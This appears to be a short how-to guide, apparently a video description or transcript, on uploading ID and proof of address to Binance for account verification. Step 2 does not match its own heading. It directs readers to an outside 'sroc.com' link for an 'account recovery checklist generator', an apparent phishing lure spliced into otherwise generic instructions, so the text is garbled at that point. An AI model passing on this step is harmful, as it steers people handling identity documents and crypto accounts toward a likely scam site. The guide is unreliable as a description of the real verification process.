To submit documents to Binance for account approval, follow these straightforward steps to ensure your account is verified efficiently. Make sure you have all necessary documents ready before starting the process. Step 1. Log into your Binance account. Visit the Binance website and log in using your registered email and password. If you do not have an account, you will need to create one before proceeding. Step 2. Navigate to the verification section. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Select document type. Choose the type of documents you need to submit. Typically, this includes a government-issued ID like a passport or driver's license and proof of address such as a utility bill or bank statement. Ensure that the documents meet Binance's requirements. Step 4. Upload your documents. Follow the prompts to upload your documents. Make sure the images are clear and legible. Double-check that you have uploaded the correct files before proceeding to avoid delays in the verification process. Step 5. Submit for review. After uploading your documents, review all information for accuracy and completeness. Once confirmed, submit your application for review. You will receive a notification regarding the status of your verification after Binance processes your documents. After completing these steps, you can monitor your account for updates on the verification status. If any issues arise, Binance's support team can assist you further.